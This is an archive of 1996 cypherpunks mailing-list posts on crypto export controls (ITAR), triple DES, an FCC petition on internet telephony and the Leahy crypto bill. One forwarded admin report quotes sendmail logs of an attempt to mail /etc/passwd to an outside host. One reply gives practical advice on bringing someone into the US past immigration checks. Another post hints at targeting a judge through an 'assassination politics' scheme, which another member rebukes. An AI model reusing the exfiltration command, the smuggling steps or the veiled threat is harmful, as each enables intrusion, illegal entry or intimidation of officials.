>   We want to use it here in National Autonomous University of Mexico, so 
>we don't want to get jailed.

I don't know about Mexican law.  US persons are not supposed to export it
without government permission, but that's not very relevant.
Mexican law may or may not restrict import or use of crypto; better check
with someone local.  (I haven't heard anything saying that it _does_
restrict it - I just don't know either way.)

>   In case we can use it somebody knows where can i get the source code ??

That part's easy - DES source is available on ftp.ox.ac.uk, and also on
ftp.dsi.unimi.it and ftp.funet.fi.  There may be specific triple-DES 
code there, but if not, triple DES is just
        Encrypt(Key1, Decrypt(Key2, Encrypt(Key3, Message)))
so you can easily write a subroutine to do that.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 27 Mar 1996 19:38:53 +0800
To: cypherpunks@toad.com
Subject: More on ACTA petition to FCC urging regulation of the Internet
In-Reply-To: <Pine.SUN.3.91.960326134252.9362B-100000@eff.org>
Message-ID: <IlKBf7C00YUvMUbVEr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



As soon as we challenged the Communications Decency Act in Federal court, 
another threat to the Net has arisen.

This one is a petition a group of long-distance companies has filed with the
FCC, urging the commission to extend its jurisdiction to the Internet and
regulate "the use of the Internet for providing telecommunications services." 
The America's Carrier's Telecommunications Association (ACTA) is whining
about voice-over-the-Net, and equating the Internet to telephone and cable TV
services. Some excerpts from the petition, filed by ACTA on March 4: 

     ACTA submits that the providers of this software are telecommunications
  carriers and, as such, should be subject to FCC regulation like all
  telecommunications cations carriers.  ACTA also submits that the FCC 
  has the authority to regulate the Internet. [...]
     ACTA asks the Commission to institute rulemaking to govern
  the use of the Internet for providing telecommunications services. [...]
     ACTA submits that it is incumbent upon the Commission to exercise
  jurisdiction over the use of the Internet for unregulated interstate and
  international telecommunications services. As a first step, ACTA submits
  that the Commission may deem it appropriate to issue a declaratory 
  ruling officially establishing its interest in and authority over
  interstate and international telecommunications services using the 
  Internet. [...] Ignored, such unregulated operations will rapidly grow and
  create a far more significant and difficult to control "private" 
  operational enclave of telecommunications providers and users. [...]
     The Commission should take the same action in 1996 with regard to
  the new technology of long distance calling via Internet as it
  did thirty years ago in 1966 with regard to the then-new technology of
  cable television: grant special relief to maintain the status quo so that
  it might carefully consider what rules are required to best protect the
  public interest and to carry out Its statutory duties. [...]
     Absent action by the Commission, the new technology could be used to
  circumvent restrictions traditionally found in tariffs concerning unlawful
  uses, such as gambling, obscenity, prostitution, drug traffic, and other
  illegal acts. 

(Note how ACTA not-too-subtly raises the spectre of the four horsemen!)

The deadline to file comments with the FCC in response to the ACTA petition
has been extended to May 8, 1996, the FCC announced yesterday in its Daily
Digest. 

A relevant back fight-censorship message about the original petition is at: 
  http://fight-censorship.dementia.org/fight-censorship/dl?num=1876

For more information, check out:
  http://www.cais.net/cannon/acta.htm

-Declan





---------- Forwarded message ----------
Date: Mon, 25 Mar 1996 20:46:24 -0500
From: Robert Cannon <cannon@cais.cais.com>
To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
Subject: ACTA Resource Page

        In conjunction with Henry Crawford, Craig Johnson, Andy Oram and
other members of Computer Professionals for Social Responsibility (CPSR), I
have uploaded an "ACTA Petition Resource Page."  It can be found at
http://www.cais.net/cannon/acta.htm  On that page I have posted the lively
and informative discussion of ACTA from Cyberia-L (I was careful to search
for anyone who did not give permission to have their message reposted - a
comment usually found in people's signature - if you object to having your
message posted, please let me know).  There is also a draft of a comment by
CPSR, an article from the American Reporter, the relevant Supreme Court
case, and, of course, the petition itself.

************************************************************
Robert Cannon, Esq.       |       ||      Leashes!
Online and Interactive    | \     @@==+   We Dont Need No
Telecommunications Law    |  ======       Stinkin' Leashes!
Washington, D.C.          |  ||  ||          -Pancho Villa
		http://www.cais.net/cannon
************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 27 Mar 1996 21:35:34 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <01I2T0RRDGQO8ZDZIP@mbcl.rutgers.edu>
Message-ID: <315908B5.72DA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
> >NETSCAPE TO GET IN ON THE PHONE-BY-INTERNET ACTION
> >Netscape co-founder Mark Andreessen says that within six months the company
> >will build into its Navigator program voice software (which it calls Insoft)
> >for making low-cost long distance calls via the Internet into its Navigator
> >program and that long-distance phone companies increasingly won't be able to
> >justify their rates for telephone service.  (Sydney Morning Herald 13 Mar 96
> >via Individual Inc.)
> 
>         Any possibility that Netscape might build in some form of cryptography?
> I realize ITAR rules would make this problematic, but perhaps some sort of
> out-of-country deal for putting in the hooks for PGPhone could be done.

  The internet phone software is coming from one of the companies that
we are acquiring.  This is one obvious application of SSL that I will be
looking into after the merger is complete.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Mar 1996 17:16:50 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603270220.DAA24963@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Subject: HP ships full DCE internationally

As I sit, somewhere not in North America, I can see a CD-Rom from
Hewlett-Packard, which I've had since last year. Recently I received the
following letter. I've attempted to retype its contents accurately.

---------8<--------8<--------8<--------8<--------8<--------8<--------8<

					[HP Logo]
Hewlett-Packard Company
Software and Information Delivery Operation, SST
690 East Middlefield Road
Mountain View, California 94043
415/968-9200


Dear HP-UX Support Customer,

Hewlett-Packard has uncovered a bundling problem in the DCE-Core fileset
that is on the October HP-UX Application Release 10.0 s700/800
Application CDs. These products were bundled such that they are not
compliant with U.S. Government export regulations. The part numbers for
the affected CDs and products are listed below.

If you have updated your systems using these CDs or for the products
listed on the October HP-UX Application Release Media, please update
your system with the enclosed January HP-UX Application Release 10.0
s700/800 Application media, and destroy the October media.

If you have not updated your systems with this media, please just
destroy the October Application Release media and use the new enclosed
Application media.

If you require a replacement for the October HP-UX 10.0 s700/800
Application CD that has this bundling problem corrected, please contact
your local support office to request shipment of the new CD.

Hewlett-Packard apologises for any inconvenience you may experience due
to this bundling issue.

Sincerely
[signed]
Charles Henderson
Software Information and Delivery Operations

CD PART NUMBERS
---------------
24998-11710	SE application s700 10/95
24998-11711     SE application s800 10/95
B3782-10054	Trade application s700 10/95
B3920-13614	Trade application s800 10/95

PRODUCT NUMBERS
---------------
10.01 800  B3191A	DCE CORE SRV MEDIA/DOCU INTL
10.01 800  B5162AA	DCE 9000 Executive Client
10.01 800  B3519AA	DCE QUICK START KIT INTL S800
10.01 800  B3923AA	CICS/9000 Bundle Media & Manuals, Int'l
10.01 700  B2921A	DCE Core Services International
10.01 700  B5162AA	DCE 9000 Executive Client S700
10.01 700  B3519AA	DCE Quickstart 700 Bndl Int'l

				Document P/N: 5964-5231

---------8<--------8<--------8<--------8<--------8<--------8<--------8<

Excuse me, I just have to go and destroy that CD :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 27 Mar 1996 22:30:48 +0800
To: John Young <jya@pipeline.com>
Subject: Re: WSJ on Big Java Flaw
In-Reply-To: <199603261558.KAA25648@pipe1.nyc.pipeline.com>
Message-ID: <31591D05.5998@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    Wall Street Journal, March 26, 1996, p. B4.
>    Researchers Find Big Security Flaw In Java Language
>    By Don Clark
> 
>    A team of Princeton University researchers said they
>    discovered the most serious security flaw yet in the widely
>    used Java programming language from Sun Microsystems Inc.
> 
>    The flaw could make it possible for unscrupulous hackers to
>    destroy files or cause other types of damage on any
>    personal computer that uses Netscape Communications Corp.'s
>    Navigator program, said Edward Felten, a Princeton
>    assistant professor of computer science who helped discover
>    the flaw.[..]
>    Mr. Felten said that unscrupulous people who discovered the
>    flaw could boobytrap a Web page on the Internet,
>    essentially seizing control of the browser software of any
>    PC that tapped into that page. At that point, the hackers
>    could read or delete an entire hard disk of data files.
>    "The consequences of this flaw are as bad as they can be,"
>    he said.[..]

The generalized halting problem comes to mind...

Since it can be proved that there's no complete set of heuristics
to tell if a given program has a characteristic (such as "secureness")
then sooner or later someone will discover another security flaw.

A question is whether a simple patch is made or if the set of heuristics
is widened (ie, learn from mistakes) so that similar flaws can be found
based on knowledge of that one flaw.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 27 Mar 1996 22:45:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto CD UpDate
In-Reply-To: <ad7df7b315021004da44@[205.199.118.202]>
Message-ID: <31592105.23B9@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> It pains me to often be the one who throws cold water on what seems to be a
> good idea, and what comes from a well-intentioned person. But I have to
> call 'em as I see 'em. And maybe I'm wrong. But here are my thoughts.[..]
> 1. The CD-ROM "freezes" the various programs, archives, etc. at the moment
> the files are finalized and the CD-ROMs are pressed (or burned individually
> on a CD-R, at somewhat higher per-copy price). If the author of the CD-ROM
> is not committed to updating the CD-ROM at frequent intervals--say, every
> few months--then the programs will exhibit "version decay" and be nearly
> useless.

A very good point... 

But that depends on the crypto put on the CD-ROM.  Some files aren't as
liable to version-decay, especially source codes and papers (which IMO
is more useful than fully-implemented crypto programs).

A CD-ROM that contains source codes (in various languages) and 
descriprions for ciphers, hashes, cryptanalysis methods, and even some 
cultural-political screeds would be more useful than one that contains
'the latest version of PGP'.

And actually version-decay isn't that bad an issue.  Put a warning file
in the CD-ROM about that, with pointers to crypto ftp- and web sites.
The publisher being comitted to putting out a new CD-ROM every year is
probably often enough in most cases.

A nice advantage of CD-ROMs is that many BBSs that aren't plugged into
the net use them.  I rememebr showing threads about a similar C'punks
CD-ROM discussion a couple of years ago to some local BBS-sysops asking
about new CD-ROMs (bored of the usual Pier and NightOwl fair)... they
were really into the idea, if nothing else than it was "hip" with a
nice plitical edge but also had a utility and education value that 
surpassed the usual gobbleware CDs.

An reference sources for hashes or ciphers and papers about them, plus
some papers about general crypto principles necessary for all newsbies
and even gurus to (re)read would be really useful.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 27 Mar 1996 22:55:11 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: About Triple DES ......
In-Reply-To: <Pine.SUN.3.92.960326221907.4439A-100000@elaine41.Stanford.EDU>
Message-ID: <315923E1.3D3B@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
[..]
> At some point in this exercise, though, we might be "raising awareness"
> among the wrong people, to cite Tim May. I wouldn't want NAFTA, the WTO,
> and so on enforcing ITAR.

It's conceivable that companies could appeal to those organizations to 
repeal ITAR crypto limits (unless an international crypto treaty is set 
up... uh ohh), since the limit unfairly disadvantages North American 
companies, and to some extent even foreign companies that might 
manufacture software in the US.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Mar 1996 23:56:05 +0800
To: cypherpunks@toad.com
Subject: Re: How to enter the US without a visa?
Message-ID: <2.2.32.19960327112937.00c4c2dc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 3/26/96 -0800, jamesd@echeque.com wrote:
>This is somewhat off topic for cypherpunks, but alt.forgery is dead, so
>cypherpunks is probably the nearest group.
>
>Suppose (hypothetically) an American resident cypherpunk had a 
>hypothetical friend who is most unlikely to obtain an American visa.
>
>Now the standard way of dealing with situation is for an American
>friend to get a certified birth certificate of someone born in 
>America, concoct some photo ID, send it to the out-of-America friend,
>and then the out-of-America friend comes in through Montego Bay or
>some similar point where there is lots of tourist traffic.

The NYT had an article last year about coming in via the "day boats" to the
Bahamas.  No confrontation with US officials at all.  The publicity may have
caused changes but it might be worth checking out.

Friend gets a round trip tickets from Ft. Lauderdale(?) to the Bahamas.
Meets smugglee in the Bahamas gives him the return half of one ticket (maybe
this could be done via Fedex).  Traveler boards boat back.  Ignores PA
announcement for all non US residents to report to the INS table "A" Deck.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Mar 1996 21:35:40 +0800
To: cypherpunks@toad.com
Subject: Black Unicorn attempts computer break in
Message-ID: <199603270945.KAA13203@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Date:         Wed, 27 Mar 1996 16:58:14 +1100
Reply-To: Linux Servers mailing list <SERVER-LINUX@NETSPACE.ORG>
Sender: Linux Servers mailing list <SERVER-LINUX@NETSPACE.ORG>
From: Steve Gibson <steve@ARIES.INTERSPACE.COM.AU>
Subject:      Strange things afoot at my SMTP port...
To: Multiple recipients of list SERVER-LINUX
              <SERVER-LINUX@NETSPACE.ORG>

I just found these while going through my messages file... do I
have any need to be concerned???
(unicorn.it.wsu.edu is now in my /etc/hosts.deny...)

Mar 23 20:39:25 aries sendmail[7469]: setsender: "|/bin/mail
rblack@unicorn.it.wsu.edu < /etc/passwd": invalid or unparseable,
received from unicorn.it.wsu.edu [1
Mar 23 20:39:25 aries sendmail[7469]: UAA07469: from="|/bin/mail
rblack@unicorn.it.wsu.edu < /etc/passwd", size=0, class=0, pri=0,
nrcpts=0, proto=SMTP, relay=uni

There were also attempts at connecting to my tftp port, although
at the time, in.tftpd wasn't on the system (it is now, and is also
in my hosts.deny to all except for local)

Thanks...


                      Interspace Australia Pty Ltd
                   Steve Gibson - System Administrator
                       <steve@interspace.com.au>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Wed, 27 Mar 1996 15:06:22 +0800
To: cypherpunks@toad.com
Subject: Test case for RSA t-shirts
Message-ID: <199603262347.LAA09880@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


[I posted this to comp.org.eff.talk but got virtually no response, maybe
 someone here can make use of it]
 
In July I'll be going to the US for a conference.  I have one of Adam Backs
RSA-in-perl t-shirts and am prepared to wear it into (and possibly back out of)
the country if anyone feels it would do any good (for example to act as a test
case for exportability).  If anyone thinks this would be useful or wants to
offer a legal opinion, let me know.
 
For something less trivial, I can also carry in a disk of crypto code or
something similar (say, 20 pages of DES bar codes) and see if I'm allowed to
take it back with me.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 28 Mar 1996 01:13:39 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , , shame)
In-Reply-To: <Pine.SOL.3.91.960325075557.28271D-100000@chivalry>
Message-ID: <Pine.SUN.3.91.960325135047.25482A-100000@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Simon Spero wrote:

> 
> If the Leahy bill is unacceptable, what legistlation is necessary? I 
> can't see how the use of cryptography in the commission of a crime needs 
> to be a separate offence, but I could see how it could be treated as a 
> special circumstance - that doesn't really needed a new law though.
[snip]

Good question.

Along this line -- what are the penalties for withholding other types of 
possible evidence from investigating officers?  It seems that often the 
penalites for "computer crimes" are more harsh than for the "normal" 
version of the crime.  Is that the case with the penalties in Leahy's bill? 

______________________________________________________________________
Rich Burroughs  --  richieb@teleport.com  --  psu07973@odin.cc.pdx.edu
http://www.teleport.com/~richieb --- Opinions are mine, not Teleport's
PGP key fingerprint:  1F A1 40 72 92 02 DE 7A  80 D0 5A 57 D3 1C 87 86





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 10:29:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
Message-ID: <199603252350.PAA08745@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:32 PM 3/25/96 -0500, Black Unicorn wrote:
>All it would take is one anti-trust case with encryption as a concealing 
>method and people would be busting down doors at night looking for PGP.

Back in the dark ages, IBM built an audio messaging system.  It was quite
popular in "cave of the winds" (IBM headquarters) because it allowed busy
executives to leave audio memos for each other without needing a secretary
to type them.  Since storage was limited, and old messages were purged from
the system it also had the effect that anti-trust discovery would have
nothing to discover.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 06:16:11 +0800
To: cypherpunks@toad.com
Subject: ITAR double standards?
Message-ID: <ad7ca1f6050210049009@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I think there's been ample evidence that the ITARs are often used to harass
U.S. companies that "won't play ball," that refuse to go along with certain
governmental policies. (Part of the think we libertarians hate about Big
Government and Lots of Laws is that government can use selective
enforcement an another lever of power. As a felon, I am acutely aware of
this power.)

Something Black Unicorn/Uni/Dirsec/whatever said reminded me of something
interesting:

At 8:45 PM 3/25/96, Black Unicorn wrote:

>Further, a entirely foreign production, say for chip manufacture, would
>probably make things easier.  I had specifically contemplated hardware
>applications.  Indeed, there are problems with both, but they don't stem
>from ITAR.

Now when I was with Intel, we made many of our chips in plants in Ireland,
Israel, and other locales outside the U.S. Some of these chips were
forbidden for export by the ITARs. And certainly the knowledge of the
engineers sent overseas was comparable to the knowledge of RSA
programmers....

(Before anyone points out that Intel presumably was not skirting the ITARs
by drop-shipping chips from Ireland directly to non-U.S. countries. This is
indeed the case. My point is a slightly different one. Read on.)

So, did Intel have to apply to the State Department's office on munitions
exports in order to send engineers to Malaysia, Israel, Germany, Ireland,
etc., to do development work? Not that I ever heard. Engineers simply
hopped on planes and that was that.

(I suspect the same is the case with programmers at RSADSI, Microsoft, etc.
That is, people ignore the Munitions Act laws which--it is argued by
some--forbid the export of "expertise.")

Where am I going with this? It seems to me that crypto companies could
point out to the ITARs/Munitions Office/etc. folks that vast amounts of
"sensitive technologies" are being developed and built by U.S. companies in
offshore locations without so much as a ripple of publicity or concern.

(I should note that in several examples I can think of, the engineers I
mentioned who were relocated to these offshore locales for chip development
later left the companies that moved them offshore and started or joined
competing companies. Sounds like an exact parallel to the dreaded "RSA
moves development to Switzerland" scenario that so many of us have urged.)

And yet mention that a crypto company is considering a move of its key
development folks to Switzerland or Austria or Zambia and watch the sparks
fly.

Sounds like a double standard to me, meant to exert pressure on the crypto
companies (whom the U.S. government, it is clear now, would just as soon
see put out of business or strictly controlled).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 28 Mar 1996 00:12:40 +0800
To: Simon Spero <declan+@CMU.EDU>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
Message-ID: <m0u1R2u-00091aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:14 AM 3/25/96 -0800, Simon Spero wrote:
>
>If the Leahy bill is unacceptable, what legistlation is necessary? I 
>can't see how the use of cryptography in the commission of a crime needs 
>to be a separate offence, but I could see how it could be treated as a 
>special circumstance - that doesn't really needed a new law though.
>
>I do feel that it should be possible for courts to sub poena crypto keys, 
>but that doesn't really need new law either 

If you really believe that, then what happens when "they" argue that crypto 
keys MUST be kept, because if they are not kept they can't be subpoenaed?  
If a manufacturer proposes building a crypto telephone where no keys are 
kept after they call ends, then it seems to me that he'd be accused of 
thwarting some "right" to courts' access to keys.  

If you disagree with this line of reasoning, then why did you say that last 
line above?  Read it carefully; remember, you wrote it.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Thu, 28 Mar 1996 00:15:42 +0800
To: "'Timothy C. May'" <tcmay@got.net>
Subject: RE: ITAR double standards?
Message-ID: <01BB1A99.C81728A0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

I think there's been ample evidence that the ITARs are often used to harass
U.S. companies that "won't play ball," that refuse to go along with certain
governmental policies. (Part of the think we libertarians hate about Big
Government and Lots of Laws is that government can use selective
enforcement an another lever of power. As a felon, I am acutely aware of
this power.)
............................................................................

You're a felon? For real?


   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Mar 1996 00:32:08 +0800
To: cypherpunks@toad.com
Subject: Re: LIST OF SHAME VOLUNTEERS
Message-ID: <199603260621.WAA13869@dfw-ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 AM 3/25/96 -0500, "Declan B. McCullagh" <declan+@CMU.EDU> wrote:
>Excerpts from internet.cypherpunks: 25-Mar-96 Re: LIST OF SHAME
>VOLUNTEERS by Black Unicorn@schloss.li 
>> I did a little weekend poking, I can confirm this.  If the Leahy bill 
>> passes, it will be a surprise (putting it mildly).
>
>Especially since there are only -- how many? -- 40 or 50 days left in
>this legislative session.

It might almost be nice to have the legislative session go out on a note of
"We were working on a bill to re-emphasize the Constitutional right
to private speech" rather than a note of "We came for the pornographers,
and you narco-terrorist child-porn-hiding cryptographers* are next on our
List**!"

...especially if it gives us some slack time to improve the (serious)
weakness of the positive-sounding parts of the bill.  Is Senator Leahy
up for re-election this round?


==== content-downsized material follows ====
[**It's especially critical not to be Next on the List during the
first few months of the Buchanan administration....]
[*and your little dog, too!]

======
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Fri, 29 Mar 1996 08:10:07 +0800
To: "'Timothy C. May'" <tcmay@got.net>
Subject: RE: ITAR double standards?
Message-ID: <01BB1A9E.0E084AC0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

>You're a felon? For real?
>

Yes.
.................................................................

Ah, yes  -   Tim the Indecent, vis-a-vis X-onomous signatures.
Sheut.  I thought maybe you'd done something really interesting.

    ..
Blanc  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 00:18:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Bad news from Judge Richey
Message-ID: <ad7cc8b108021004a985@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:28 AM 3/26/96, jim bell wrote:

>I realize that this may appear to be a rather disrespectful tactic, but have
>you considered reminding the judge that if you are not allowed to profit by
>exporting encryption that the government doesn't want to see exported,
>you'll just have to make money in some other way, and this may lead you to
>talk to Jim Bell about implementing a program using encryption that doesn't
>_need_ to be exported...legally anyway.

Whoahh! Hold on there, Jimbo! You're crossing the line.

You're coming perilously close to actually calling for the killing of a
federal judge. My recollection is that a couple of folks have been arrested
and charged for calling for the killing of judges.

You can skirt the issue by saying, in your "literal reading" mode, that you
have not called for any such thing. However, we have read your
"assassination politics" stuff ad nauseum, and it is clear from your
language above that you are suggesting that this judge be made the target
of one of your "betting pools." This is a plausible reading of your words.
What may save your bacon, if any law enforcement or district attorney types
are reading this, is that you are sort of the "neighborhood whacko" and
your ramblings are unlikely to be acted upon by anyone, including yourself.

Still, it does your "idea" no good to be talking about using your
"assassination politics" scheme to have a judge whacked.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 12:22:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: NSA/ITAR
Message-ID: <ad7ccc670902100488a9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:43 PM 3/25/96, Vladimir Z. Nuri wrote:
>TCM:
>
>>* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
>>companies, but is not _per se_ an issue I worry about. So long as I have
>>strong crypto, I don't really care too much about export. It would be nice
>>to get the ITARs modified, but not at the risk of adding language (such as
>>Leahy did) making use of encryption a possible crime (we've debated this,
>>so I won't elaborate here). Besides, I think the best way to overturn the
>>ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>>felt that the ITARs would not withstand court scrutiny.
>
>hmmmm, I don't recall you saying that. would love to hear more about
>"NSA's lawyers feeling the ITAR cannot withstand court scrutiny".

My most recent mention of this was a few days ago, where I cited Carl
Nicolai, inventor of the suppressed "PhasorPhone," as my source. He and his
lawyer got access to papers inside the NSA building, though they could not
make copies. They found memos from NSA staffers saying that the ITARs had
never been tested in court and would not likely survive a full
Consitutional test and that it would thus be best if court cases were
avoided.

I passed this information along to the Lee Tien, representing Gilmore in
various cases, and to Phil Karn.

--Medusa







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 00:23:27 +0800
To: blanc <blancw@accessone.com>
Subject: RE: ITAR double standards?
Message-ID: <ad7ccd6c0a021004c603@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:13 AM 3/26/96, blanc wrote:
>From:   Timothy C. May
>
>I think there's been ample evidence that the ITARs are often used to harass
>U.S. companies that "won't play ball," that refuse to go along with certain
>governmental policies. (Part of the think we libertarians hate about Big
>Government and Lots of Laws is that government can use selective
>enforcement an another lever of power. As a felon, I am acutely aware of
>this power.)
>............................................................................
>
>You're a felon? For real?
>

Yes.

--Tim


THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 11:58:21 +0800
To: cypherpunks@toad.com
Subject: Why NSA is afraid that ITARs will be thrown out in court
Message-ID: <ad7cd9f50d021004b7ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 AM 3/26/96, jamesd@echeque.com wrote:
>At 12:23 PM 3/25/96 -0800, Timothy C. May wrote:
>> Besides, I think the best way to overturn the
>> ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>> felt that the ITARs would not withstand court scrutiny.
>
>Note that the spooks have carefully avoided a full bore court
>showdown.  They harassed Phil until the statute of limitations
>caught up with them, but never brought it to trial.  If we had
>no further legislation, and the courts broke ITAR, we would
>be home free.  No plausible legislation could give us that.

Someone said he had missed my reference to this, and wanted to know more.
So, I'll also pass it on here again.

In the summer of 1994 I got a call from Carl Nicolai, the inventor of the
"PhasorPhone," an audio-scrambling phone that was suppressed with a Patent
Secrecy Order (ordered by the NSA). This was around 1980-81, and is covered
in Bamford. He told me a bunch of things, including this:

Carl and his lawyer got access to papers inside the NSA building, though
they could not make copies. They found memos from NSA staffers saying that
the ITARs had never been tested in court and would not likely survive a
full Constitutional test and that it would thus be best if court cases were
avoided.

I passed this information along (if memory serves) to Lee Tien,
representing Gilmore in various cases, and to Phil Karn. (One of them, I
don't recall which, posted a message a while later saying that such
documents had been found....I don't recall the details, but this was
probably around fall of 1994.)

Whether this NSA paranoia has anything to do with the final decision on the
Zimmermann et. al. matter is unclear, but it is likely that a very strong
challenge to the ITARs--maybe the appeal by Phil Karn is such a challenge,
maybe the Bernstein case--will result in big chunks of the ITARs being
thrown out.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
